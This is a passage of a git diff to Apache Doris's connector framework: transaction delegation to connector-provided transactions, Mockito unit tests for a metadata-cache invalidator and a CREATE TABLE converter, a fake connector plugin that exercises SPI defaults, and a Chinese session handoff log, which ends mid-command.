  • {@link #begin()} — legacy auto-commit path used by + * {@code BaseExternalTableInsertExecutor}. The manager allocates a txn id via + * {@link Env#getNextId()} and stores a no-op transaction; the actual write side + * effects are produced by {@code ConnectorWriteOps.finishInsert/abortInsert}. + * This path is used by connectors that do not implement SPI transactions + * (e.g. JDBC, ES).
  • + *
  • {@link #begin(ConnectorTransaction)} — SPI path for connectors that return a + * real {@link ConnectorTransaction} from {@code ConnectorWriteOps.beginTransaction}. + * The manager uses {@link ConnectorTransaction#getTransactionId()} as the txn id + * and delegates commit/rollback/close to the connector.
  • + *
+ * + *

Both paths share the same {@link #commit(long)} / {@link #rollback(long)} surface + * required by {@link TransactionManager}.

*/ public class PluginDrivenTransactionManager implements TransactionManager { @@ -45,12 +57,25 @@ public class PluginDrivenTransactionManager implements TransactionManager { @Override public long begin() { long txnId = Env.getCurrentEnv().getNextId(); - PluginDrivenTransaction txn = new PluginDrivenTransaction(txnId); - transactions.put(txnId, txn); + transactions.put(txnId, new PluginDrivenTransaction(txnId, null)); LOG.debug("Plugin-driven transaction begun: {}", txnId); return txnId; } + /** + * Registers a connector-provided {@link ConnectorTransaction}. Commit / rollback + * lifecycle is delegated to it (including {@code close()}). + * + * @return the txn id, taken from {@code connectorTx.getTransactionId()} + */ + public long begin(ConnectorTransaction connectorTx) { + Objects.requireNonNull(connectorTx, "connectorTx"); + long txnId = connectorTx.getTransactionId(); + transactions.put(txnId, new PluginDrivenTransaction(txnId, connectorTx)); + LOG.debug("Plugin-driven transaction begun with SPI ConnectorTransaction: {}", txnId); + return txnId; + } + @Override public void commit(long id) throws UserException { PluginDrivenTransaction txn = transactions.remove(id); @@ -79,24 +104,50 @@ public Transaction getTransaction(long id) throws UserException { } /** - * Simple transaction that tracks state. Actual connector-level commit/rollback - * is performed by the insert executor via ConnectorWriteOps. + * Internal transaction record. When {@code connectorTx} is non-null the SPI is + * the source of truth and commit/rollback delegate to it; close() always runs + * after delegation. When null, this is the legacy no-op marker (the executor + * drives write side effects via {@code ConnectorWriteOps} directly). */ - private static class PluginDrivenTransaction implements Transaction { + private static final class PluginDrivenTransaction implements Transaction { private final long id; + private final ConnectorTransaction connectorTx; - PluginDrivenTransaction(long id) { + PluginDrivenTransaction(long id, ConnectorTransaction connectorTx) { this.id = id; + this.connectorTx = connectorTx; } @Override public void commit() { - // No-op: actual commit is done via ConnectorWriteOps.finishInsert() + if (connectorTx == null) { + return; + } + try { + connectorTx.commit(); + } finally { + closeQuietly(); + } } @Override public void rollback() { - // No-op: actual rollback is done via ConnectorWriteOps.abortInsert() + if (connectorTx == null) { + return; + } + try { + connectorTx.rollback(); + } finally { + closeQuietly(); + } + } + + private void closeQuietly() { + try { + connectorTx.close(); + } catch (Exception e) { + LOG.warn("Failed to close ConnectorTransaction {}: {}", id, e.getMessage()); + } } } } diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/ExternalMetaCacheInvalidatorTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/ExternalMetaCacheInvalidatorTest.java new file mode 100644 index 00000000000000..94f50a91138613 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/ExternalMetaCacheInvalidatorTest.java @@ -0,0 +1,107 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector; + +import org.apache.doris.catalog.Env; +import org.apache.doris.datasource.ExternalMetaCacheMgr; + +import org.junit.jupiter.api.Test; +import org.mockito.MockedStatic; +import org.mockito.Mockito; + +import java.util.Arrays; + +/** + * Verifies {@link ExternalMetaCacheInvalidator} routes each SPI invalidate* + * call to the right method on {@link ExternalMetaCacheMgr}, scoped to the + * catalog id captured at construction time. + * + *

The static {@code Env.getCurrentEnv()} is stubbed via Mockito so the + * test runs without bringing up the full FE. + */ +public class ExternalMetaCacheInvalidatorTest { + + private static final long CATALOG_ID = 42L; + + @Test + public void invalidateAllRoutesToInvalidateCatalog() { + runWithMockedMgr(mgr -> { + new ExternalMetaCacheInvalidator(CATALOG_ID).invalidateAll(); + Mockito.verify(mgr).invalidateCatalog(CATALOG_ID); + Mockito.verifyNoMoreInteractions(mgr); + }); + } + + @Test + public void invalidateDatabaseRoutesToInvalidateDb() { + runWithMockedMgr(mgr -> { + new ExternalMetaCacheInvalidator(CATALOG_ID).invalidateDatabase("sales"); + Mockito.verify(mgr).invalidateDb(CATALOG_ID, "sales"); + Mockito.verifyNoMoreInteractions(mgr); + }); + } + + @Test + public void invalidateTableRoutesToInvalidateTable() { + runWithMockedMgr(mgr -> { + new ExternalMetaCacheInvalidator(CATALOG_ID).invalidateTable("sales", "orders"); + Mockito.verify(mgr).invalidateTable(CATALOG_ID, "sales", "orders"); + Mockito.verifyNoMoreInteractions(mgr); + }); + } + + /** + * Partition-scope invalidation currently falls back to table-level invalidation + * because the SPI carries partition column values, not names — see the inline + * comment in {@link ExternalMetaCacheInvalidator#invalidatePartition}. This + * test pins the documented behavior so a future SPI extension that allows the + * scope to narrow is forced to update the bridge AND this test together. + */ + @Test + public void invalidatePartitionFallsBackToInvalidateTable() { + runWithMockedMgr(mgr -> { + new ExternalMetaCacheInvalidator(CATALOG_ID) + .invalidatePartition("sales", "orders", Arrays.asList("2024", "01")); + Mockito.verify(mgr).invalidateTable(CATALOG_ID, "sales", "orders"); + Mockito.verifyNoMoreInteractions(mgr); + }); + } + + /** + * Stats-only invalidation is intentionally a no-op today — see the inline + * comment in {@link ExternalMetaCacheInvalidator#invalidateStatistics}. + * Verifying zero interactions makes any silent change visible. + */ + @Test + public void invalidateStatisticsIsNoopForNow() { + runWithMockedMgr(mgr -> { + new ExternalMetaCacheInvalidator(CATALOG_ID).invalidateStatistics("sales", "orders"); + Mockito.verifyNoInteractions(mgr); + }); + } + + private static void runWithMockedMgr(java.util.function.Consumer body) { + ExternalMetaCacheMgr mgr = Mockito.mock(ExternalMetaCacheMgr.class); + Env env = Mockito.mock(Env.class); + Mockito.when(env.getExtMetaCacheMgr()).thenReturn(mgr); + try (MockedStatic envStatic = Mockito.mockStatic(Env.class)) { + envStatic.when(Env::getCurrentEnv).thenReturn(env); + body.accept(mgr); + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java new file mode 100644 index 00000000000000..dc5e571fccafc2 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java @@ -0,0 +1,264 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.ddl; + +import org.apache.doris.catalog.PartitionType; +import org.apache.doris.connector.api.ConnectorColumn; +import org.apache.doris.connector.api.ddl.ConnectorBucketSpec; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.ddl.ConnectorPartitionField; +import org.apache.doris.connector.api.ddl.ConnectorPartitionSpec; +import org.apache.doris.nereids.analyzer.UnboundFunction; +import org.apache.doris.nereids.analyzer.UnboundSlot; +import org.apache.doris.nereids.trees.expressions.Expression; +import org.apache.doris.nereids.trees.expressions.literal.IntegerLiteral; +import org.apache.doris.nereids.trees.plans.commands.info.ColumnDefinition; +import org.apache.doris.nereids.trees.plans.commands.info.CreateTableInfo; +import org.apache.doris.nereids.trees.plans.commands.info.DistributionDescriptor; +import org.apache.doris.nereids.trees.plans.commands.info.PartitionTableInfo; +import org.apache.doris.nereids.types.IntegerType; +import org.apache.doris.nereids.types.StringType; + +import com.google.common.collect.ImmutableList; +import com.google.common.collect.ImmutableMap; +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Arrays; +import java.util.Collections; +import java.util.List; + +/** + * Covers each branch of {@link CreateTableInfoToConnectorRequestConverter}: + * the four partition styles (IDENTITY, TRANSFORM, LIST, RANGE) and both + * bucket flavors (hash, random), plus the no-partition / no-distribution + * fall-throughs. + * + *

{@link CreateTableInfo} is mocked because its full constructor pulls in + * heavy nereids analyzer state; the converter only reads a handful of + * getters from it, all of which are easy to stub. + */ +public class CreateTableInfoToConnectorRequestConverterTest { + + @Test + public void columnsAndScalarFieldsArePassedThrough() { + ColumnDefinition idCol = new ColumnDefinition( + "id", IntegerType.INSTANCE, false, "primary key"); + ColumnDefinition nameCol = new ColumnDefinition( + "name", StringType.INSTANCE, true, "display name"); + CreateTableInfo info = stubInfo( + "orders", + Arrays.asList(idCol, nameCol), + null, + null, + "an orders table", + ImmutableMap.of("k", "v"), + true, + true); + + ConnectorCreateTableRequest req = CreateTableInfoToConnectorRequestConverter + .convert(info, "sales"); + + Assertions.assertEquals("sales", req.getDbName()); + Assertions.assertEquals("orders", req.getTableName()); + Assertions.assertEquals("an orders table", req.getComment()); + Assertions.assertEquals(ImmutableMap.of("k", "v"), req.getProperties()); + Assertions.assertTrue(req.isIfNotExists()); + Assertions.assertTrue(req.isExternal()); + + Assertions.assertEquals(2, req.getColumns().size()); + ConnectorColumn col0 = req.getColumns().get(0); + Assertions.assertEquals("id", col0.getName()); + Assertions.assertFalse(col0.isNullable()); + Assertions.assertEquals("primary key", col0.getComment()); + ConnectorColumn col1 = req.getColumns().get(1); + Assertions.assertEquals("name", col1.getName()); + Assertions.assertTrue(col1.isNullable()); + + // No partition / distribution in this fixture. + Assertions.assertNull(req.getPartitionSpec()); + Assertions.assertNull(req.getBucketSpec()); + } + + @Test + public void identityPartitionStyle() { + // PARTITIONED BY (dt) on a Hive-style external table. + PartitionTableInfo partition = new PartitionTableInfo( + false, + PartitionType.UNPARTITIONED.name(), + null, + ImmutableList.of(new UnboundSlot("dt"))); + ConnectorPartitionSpec spec = convertWithPartition(partition).getPartitionSpec(); + + Assertions.assertNotNull(spec); + Assertions.assertEquals(ConnectorPartitionSpec.Style.IDENTITY, spec.getStyle()); + Assertions.assertEquals(1, spec.getFields().size()); + ConnectorPartitionField field = spec.getFields().get(0); + Assertions.assertEquals("dt", field.getColumnName()); + Assertions.assertEquals("identity", field.getTransform()); + Assertions.assertTrue(field.getTransformArgs().isEmpty()); + Assertions.assertTrue(spec.getInitialValues().isEmpty()); + } + + @Test + public void transformPartitionStyleWithIcebergStyleFunctions() { + // PARTITIONED BY (bucket(16, id), year(d)) — Iceberg style. + Expression bucket = new UnboundFunction("bucket", + Arrays.asList(new UnboundSlot("id"), new IntegerLiteral(16))); + Expression year = new UnboundFunction("YEAR", + Collections.singletonList(new UnboundSlot("d"))); + PartitionTableInfo partition = new PartitionTableInfo( + false, + PartitionType.UNPARTITIONED.name(), + null, + ImmutableList.of(bucket, year)); + + ConnectorPartitionSpec spec = convertWithPartition(partition).getPartitionSpec(); + Assertions.assertNotNull(spec); + Assertions.assertEquals(ConnectorPartitionSpec.Style.TRANSFORM, spec.getStyle()); + + Assertions.assertEquals(2, spec.getFields().size()); + ConnectorPartitionField bucketField = spec.getFields().get(0); + Assertions.assertEquals("id", bucketField.getColumnName()); + Assertions.assertEquals("bucket", bucketField.getTransform()); + Assertions.assertEquals(Collections.singletonList(16), bucketField.getTransformArgs()); + + ConnectorPartitionField yearField = spec.getFields().get(1); + Assertions.assertEquals("d", yearField.getColumnName()); + // transform name is lower-cased even though the source was uppercase. + Assertions.assertEquals("year", yearField.getTransform()); + Assertions.assertTrue(yearField.getTransformArgs().isEmpty()); + } + + @Test + public void listPartitionStyle() { + // PARTITION BY LIST (region) — Doris native list partitioning. + PartitionTableInfo partition = new PartitionTableInfo( + false, + PartitionType.LIST.name(), + null, + ImmutableList.of(new UnboundSlot("region"))); + + ConnectorPartitionSpec spec = convertWithPartition(partition).getPartitionSpec(); + Assertions.assertNotNull(spec); + Assertions.assertEquals(ConnectorPartitionSpec.Style.LIST, spec.getStyle()); + Assertions.assertEquals(1, spec.getFields().size()); + Assertions.assertEquals("region", spec.getFields().get(0).getColumnName()); + // initialValues lowering is deferred — see converter inline comment. + Assertions.assertTrue(spec.getInitialValues().isEmpty()); + } + + @Test + public void rangePartitionStyle() { + // PARTITION BY RANGE (dt) — Doris native range partitioning. + PartitionTableInfo partition = new PartitionTableInfo( + false, + PartitionType.RANGE.name(), + null, + ImmutableList.of(new UnboundSlot("dt"))); + + ConnectorPartitionSpec spec = convertWithPartition(partition).getPartitionSpec(); + Assertions.assertNotNull(spec); + Assertions.assertEquals(ConnectorPartitionSpec.Style.RANGE, spec.getStyle()); + Assertions.assertEquals(1, spec.getFields().size()); + Assertions.assertEquals("dt", spec.getFields().get(0).getColumnName()); + Assertions.assertTrue(spec.getInitialValues().isEmpty()); + } + + @Test + public void hashDistributionMapsToDorisDefaultAlgorithm() { + DistributionDescriptor dd = new DistributionDescriptor( + true, false, 4, Arrays.asList("id")); + ConnectorBucketSpec bucket = convertWithDistribution(dd).getBucketSpec(); + + Assertions.assertNotNull(bucket); + Assertions.assertEquals(Arrays.asList("id"), bucket.getColumns()); + Assertions.assertEquals(4, bucket.getNumBuckets()); + Assertions.assertEquals("doris_default", bucket.getAlgorithm()); + } + + @Test + public void randomDistributionMapsToDorisRandomAlgorithm() { + DistributionDescriptor dd = new DistributionDescriptor( + false, false, 8, Collections.emptyList()); + ConnectorBucketSpec bucket = convertWithDistribution(dd).getBucketSpec(); + + Assertions.assertNotNull(bucket); + Assertions.assertEquals(Collections.emptyList(), bucket.getColumns()); + Assertions.assertEquals(8, bucket.getNumBuckets()); + Assertions.assertEquals("doris_random", bucket.getAlgorithm()); + } + + // ──────────────────── helpers ──────────────────── + + private static ConnectorCreateTableRequest convertWithPartition( + PartitionTableInfo partition) { + return CreateTableInfoToConnectorRequestConverter.convert( + stubInfo("t", + Collections.singletonList(new ColumnDefinition( + "id", IntegerType.INSTANCE, true)), + partition, + null, + "", + Collections.emptyMap(), + false, + false), + "db"); + } + + private static ConnectorCreateTableRequest convertWithDistribution( + DistributionDescriptor distribution) { + return CreateTableInfoToConnectorRequestConverter.convert( + stubInfo("t", + Collections.singletonList(new ColumnDefinition( + "id", IntegerType.INSTANCE, true)), + null, + distribution, + "", + Collections.emptyMap(), + false, + false), + "db"); + } + + /** + * Builds a mock {@link CreateTableInfo} answering only the getters that + * the converter actually reads. Saves the test from threading 18 args + * through the real ctor (which also calls {@code PropertyAnalyzer}). + */ + private static CreateTableInfo stubInfo(String tableName, + List columns, + PartitionTableInfo partition, + DistributionDescriptor distribution, + String comment, + java.util.Map properties, + boolean ifNotExists, + boolean external) { + CreateTableInfo info = Mockito.mock(CreateTableInfo.class); + Mockito.when(info.getTableName()).thenReturn(tableName); + Mockito.when(info.getColumnDefinitions()).thenReturn(columns); + Mockito.when(info.getPartitionTableInfo()).thenReturn(partition); + Mockito.when(info.getDistribution()).thenReturn(distribution); + Mockito.when(info.getComment()).thenReturn(comment); + Mockito.when(info.getProperties()).thenReturn(properties); + Mockito.when(info.isIfNotExists()).thenReturn(ifNotExists); + Mockito.when(info.isExternal()).thenReturn(external); + return info; + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPlugin.java b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPlugin.java new file mode 100644 index 00000000000000..1cf144f4a4d457 --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPlugin.java @@ -0,0 +1,143 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.fake; + +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.connector.spi.ConnectorProvider; + +import java.util.Collections; +import java.util.Map; + +/** + * "Empty" connector plugin used as a baseline by P0 batch-2 tests. + * + *

Implements only the bare minimum of the SPI surface so that every + * other method on {@link Connector}, {@link ConnectorMetadata}, + * {@link ConnectorSession}, and {@link ConnectorContext} exercises its + * default implementation. Tests that depend on a particular default + * behavior (e.g. {@code listPartitionNames()} returning an empty list, + * {@code beginTransaction()} throwing) can construct a fake catalog from + * this plugin without having to stub each interface by hand. + * + *

NOT registered via {@code META-INF/services} — tests instantiate it + * directly to keep production discovery deterministic. + */ +public final class FakeConnectorPlugin implements ConnectorProvider { + + public static final String TYPE = "fake"; + + @Override + public String getType() { + return TYPE; + } + + @Override + public Connector create(Map properties, ConnectorContext context) { + return new FakeConnector(); + } + + /** Connector exposing a metadata that overrides nothing. */ + public static final class FakeConnector implements Connector { + @Override + public ConnectorMetadata getMetadata(ConnectorSession session) { + return new FakeMetadata(); + } + } + + /** {@link ConnectorMetadata} with zero overrides — every method uses the default. */ + public static final class FakeMetadata implements ConnectorMetadata { + } + + /** {@link ConnectorSession} that only fills the always-required fields. */ + public static final class FakeSession implements ConnectorSession { + + private final String catalogName; + private final long catalogId; + + public FakeSession(String catalogName, long catalogId) { + this.catalogName = catalogName; + this.catalogId = catalogId; + } + + @Override + public String getQueryId() { + return "fake-query"; + } + + @Override + public String getUser() { + return "fake-user"; + } + + @Override + public String getTimeZone() { + return "UTC"; + } + + @Override + public String getLocale() { + return "en_US"; + } + + @Override + public long getCatalogId() { + return catalogId; + } + + @Override + public String getCatalogName() { + return catalogName; + } + + @Override + @SuppressWarnings("unchecked") + public T getProperty(String name, Class type) { + return null; + } + + @Override + public Map getCatalogProperties() { + return Collections.emptyMap(); + } + } + + /** {@link ConnectorContext} that only fills catalog name + id. */ + public static final class FakeContext implements ConnectorContext { + + private final String catalogName; + private final long catalogId; + + public FakeContext(String catalogName, long catalogId) { + this.catalogName = catalogName; + this.catalogId = catalogId; + } + + @Override + public String getCatalogName() { + return catalogName; + } + + @Override + public long getCatalogId() { + return catalogId; + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java new file mode 100644 index 00000000000000..0d419aa4e90e7c --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/connector/fake/FakeConnectorPluginTest.java @@ -0,0 +1,187 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.fake; + +import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorMetadata; +import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.ddl.ConnectorCreateTableRequest; +import org.apache.doris.connector.api.handle.ConnectorTableHandle; +import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.connector.spi.ConnectorMetaInvalidator; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.Optional; + +/** + * Exercises the SPI default fall-throughs through {@link FakeConnectorPlugin}. + * + *

The fake overrides nothing beyond the minimum required to compile — every + * assertion below targets a default method body added during P0 batches 0+1. + * If a future change accidentally drops or alters a default, this test fails + * before the change reaches any real connector. + */ +public class FakeConnectorPluginTest { + + private FakeConnectorPlugin plugin; + private Connector connector; + private ConnectorSession session; + private ConnectorMetadata metadata; + + @BeforeEach + void setUp() { + plugin = new FakeConnectorPlugin(); + ConnectorContext context = new FakeConnectorPlugin.FakeContext("fake_cat", 1L); + connector = plugin.create(Collections.emptyMap(), context); + session = new FakeConnectorPlugin.FakeSession("fake_cat", 1L); + metadata = connector.getMetadata(session); + } + + // ──────────────────── ConnectorContext defaults ──────────────────── + + @Test + void contextMetaInvalidatorDefaultsToNoop() { + ConnectorContext context = new FakeConnectorPlugin.FakeContext("fake_cat", 1L); + // T04: default getMetaInvalidator() returns NOOP — exercising it must not throw. + Assertions.assertSame(ConnectorMetaInvalidator.NOOP, + context.getMetaInvalidator(), + "default ConnectorContext.getMetaInvalidator() should return NOOP"); + context.getMetaInvalidator().invalidateAll(); + context.getMetaInvalidator().invalidateDatabase("db"); + context.getMetaInvalidator().invalidateTable("db", "t"); + context.getMetaInvalidator().invalidatePartition( + "db", "t", Collections.singletonList("2024")); + context.getMetaInvalidator().invalidateStatistics("db", "t"); + } + + // ──────────────────── ConnectorSession defaults ──────────────────── + + @Test + void sessionCurrentTransactionDefaultsToEmpty() { + // T07: default getCurrentTransaction() returns Optional.empty(). + Assertions.assertEquals(Optional.empty(), session.getCurrentTransaction()); + } + + @Test + void sessionSessionPropertiesDefaultsToEmpty() { + Assertions.assertTrue(session.getSessionProperties().isEmpty()); + } + + // ──────────────────── ConnectorMetadata defaults (E5 MVCC) ──────────────────── + + @Test + void mvccSnapshotMethodsDefaultToEmpty() { + ConnectorTableHandle handle = new ConnectorTableHandle() { }; + // T08: all three mvcc defaults return Optional.empty() — connector opts out of MVCC. + Assertions.assertEquals(Optional.empty(), + metadata.beginQuerySnapshot(session, handle)); + Assertions.assertEquals(Optional.empty(), + metadata.getSnapshotAt(session, handle, 0L)); + Assertions.assertEquals(Optional.empty(), + metadata.getSnapshotById(session, handle, 0L)); + } + + // ──────────────────── ConnectorSchemaOps defaults ──────────────────── + + @Test + void schemaOpsDefaults() { + Assertions.assertTrue(metadata.listDatabaseNames(session).isEmpty()); + Assertions.assertFalse(metadata.databaseExists(session, "anydb")); + } + + // ──────────────────── ConnectorTableOps defaults ──────────────────── + + @Test + void tableOpsListDefaults() { + // SHOW TABLES against an unimplemented connector returns empty rather than throwing. + Assertions.assertTrue(metadata.listTableNames(session, "any_db").isEmpty()); + + Assertions.assertEquals(Optional.empty(), + metadata.getTableHandle(session, "db", "t")); + Assertions.assertTrue(metadata.getPrimaryKeys(session, "db", "t").isEmpty()); + Assertions.assertEquals("", metadata.getTableComment(session, "db", "t")); + } + + @Test + void partitionListingDefaultsToEmpty() { + ConnectorTableHandle handle = new ConnectorTableHandle() { }; + // T17-T19: all three listing defaults return empty. + Assertions.assertTrue( + metadata.listPartitionNames(session, handle).isEmpty()); + Assertions.assertTrue( + metadata.listPartitions(session, handle, Optional.empty()).isEmpty()); + Assertions.assertTrue( + metadata.listPartitionValues(session, handle, + Collections.singletonList("dt")).isEmpty()); + } + + @Test + void createTableRequestDefaultDegradesToLegacy() { + ConnectorCreateTableRequest request = ConnectorCreateTableRequest.builder() + .dbName("db") + .tableName("t") + .columns(Collections.emptyList()) + .properties(Collections.emptyMap()) + .build(); + // T14: default createTable(request) falls through to legacy createTable(schema, + // props), whose own default throws "CREATE TABLE not supported". This proves + // the fall-through chain is wired correctly, even if the connector ultimately + // rejects the request. + DorisConnectorException ex = Assertions.assertThrows( + DorisConnectorException.class, + () -> metadata.createTable(session, request)); + Assertions.assertTrue(ex.getMessage().contains("CREATE TABLE not supported"), + "should propagate legacy createTable's error, got: " + ex.getMessage()); + } + + // ──────────────────── ConnectorWriteOps defaults ──────────────────── + + @Test + void writeOpsCapabilitiesDefaultToFalse() { + Assertions.assertFalse(metadata.supportsInsert()); + Assertions.assertFalse(metadata.supportsDelete()); + Assertions.assertFalse(metadata.supportsMerge()); + } + + @Test + void beginTransactionDefaultThrows() { + // T06: default beginTransaction throws — engine treats statement as auto-commit. + DorisConnectorException ex = Assertions.assertThrows( + DorisConnectorException.class, + () -> metadata.beginTransaction(session)); + Assertions.assertTrue(ex.getMessage().contains("Transactions not supported"), + "expected transaction-not-supported message, got: " + ex.getMessage()); + } + + // ──────────────────── Connector-level defaults ──────────────────── + + @Test + void connectorTopLevelDefaults() { + Assertions.assertNull(connector.getScanPlanProvider()); + Assertions.assertTrue(connector.getCapabilities().isEmpty()); + Assertions.assertTrue(connector.getTableProperties().isEmpty()); + Assertions.assertTrue(connector.getSessionProperties().isEmpty()); + Assertions.assertFalse(connector.defaultTestConnection()); + Assertions.assertTrue(connector.testConnection(session).isSuccess()); + } +} diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 228d7ad910df83..9219adff17d282 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -8,143 +8,151 @@ ## 📅 最后一次 handoff -- **日期 / 时间**:2026-05-24(同日两次更新) +- **日期 / 时间**:2026-05-24(夜 ③) - **本 session 主导者**:Claude Opus 4.7(1M context) -- **本 session 主题**:建立项目跟踪机制(完整版) -- **预估 context 使用**:~70%(进入"警觉"区,已停止接新任务) +- **本 session 主题**:P0 批 2 守门 + 单测(T21-T23, T26-T27;T24-T25 转交用户在本地跑)—— **已 commit**(用户人工 review 通过;hash 见 `git log --oneline -3`,subject `[feat](connector) add P0 batch 2 gate + unit tests (T21-T23, T26-T27)`) +- **预估 context 使用**:~55%(健康) --- ## ✅ 本 session 完成项 -### 1. 决策闭环(前半段) -- ✅ Master plan §5 — 12 个项目决策点(D1-D12)全部按推荐确认 -- ✅ SPI RFC §16.2 — 6 个未决问题(U1-U6)全部决议(U4 改批量化) - -### 2. 跟踪机制建立(后半段,全部完成) -- ✅ `plan-doc/README.md` — 跟踪机制使用指南 + 文档索引 -- ✅ `plan-doc/PROGRESS.md` — 全局仪表盘(阶段进度、连接器看板、活跃 task、风险监控、session 状态) -- ✅ `plan-doc/AGENT-PLAYBOOK.md` — Agent 协作规范(context 预算、subagent 使用、handoff 触发、强制纪律、anti-patterns) -- ✅ `plan-doc/HANDOFF.md` — 本文件(滚动) -- ✅ `plan-doc/decisions-log.md` — 18 条 ADR(D-001..D-018) -- ✅ `plan-doc/deviations-log.md` — 空模板(DV-NNN 待用) -- ✅ `plan-doc/risks.md` — 14 个风险条目(R-001..R-014),含状态矩阵 -- ✅ `plan-doc/tasks/_template.md` — 阶段任务模板 -- ✅ `plan-doc/tasks/P0-spi-foundation.md` — P0 全部 27 个子任务清单 -- ✅ `plan-doc/connectors/_template.md` — 连接器跟踪模板 -- ✅ `plan-doc/connectors/{jdbc,es,trino-connector,hudi,maxcompute,paimon,iceberg,hive}.md` — 8 个连接器跟踪文件 -- ✅ `plan-doc/00-connector-migration-master-plan.md` 顶部加入跟踪体系入口链接 - -总计 **17 个文件**,220K,覆盖项目战略 + 进度 + 决策 + 风险 + 任务 + 连接器 + agent 协作 6 个维度。 +### 1. P0 批 2:守门 + 单测(T21-T23, T26-T27) + +| ID | 任务 | 文件 | 备注 | +|---|---|---|---| +| T21 ✅ | `tools/check-connector-imports.sh` | **新** `tools/check-connector-imports.sh` | grep 守门;接受可选 ROOT 参数;正负冒烟均通过 | +| T22 ✅ | exec-maven-plugin 接入脚本 | edit `fe-connector/pom.xml` | 绑 `validate` 阶段;`inherited=false`;用 `${project.basedir}/../../tools/...` 避开 `fe.dir` 解析时序 | +| T23 ✅ | `FakeConnectorPlugin` + 默认行为测试 | **新** `fe-core/src/test/java/.../connector/fake/{FakeConnectorPlugin,FakeConnectorPluginTest}.java` | 11 个 @Test;零 override 的 `FakeMetadata` 验证所有 default 路径 | +| T24 ⏳ | JDBC regression-test | — | **转交用户**在本地跑 | +| T25 ⏳ | ES regression-test | — | **转交用户**在本地跑 | +| T26 ✅ | `ExternalMetaCacheInvalidator` 路由测试 | **新** `fe-core/src/test/java/.../connector/ExternalMetaCacheInvalidatorTest.java` | 5 个 @Test;`MockedStatic` + `mock(ExternalMetaCacheMgr)`;pin partition fallback & stats no-op | +| T27 ✅ | converter 单测 | **新** `fe-core/src/test/java/.../connector/ddl/CreateTableInfoToConnectorRequestConverterTest.java` | 7 个 @Test;`mock(CreateTableInfo)` 绕开 18-arg ctor;4 partition style + 2 bucket + 列穿透 | + +### 2. 验证 + +- `tools/check-connector-imports.sh` 正/负冒烟测试通过 +- `mvn -pl fe-connector validate -Dmaven.build.cache.enabled=false` → **BUILD SUCCESS**(exec-maven-plugin 调起脚本) +- `mvn -pl fe-core -am test 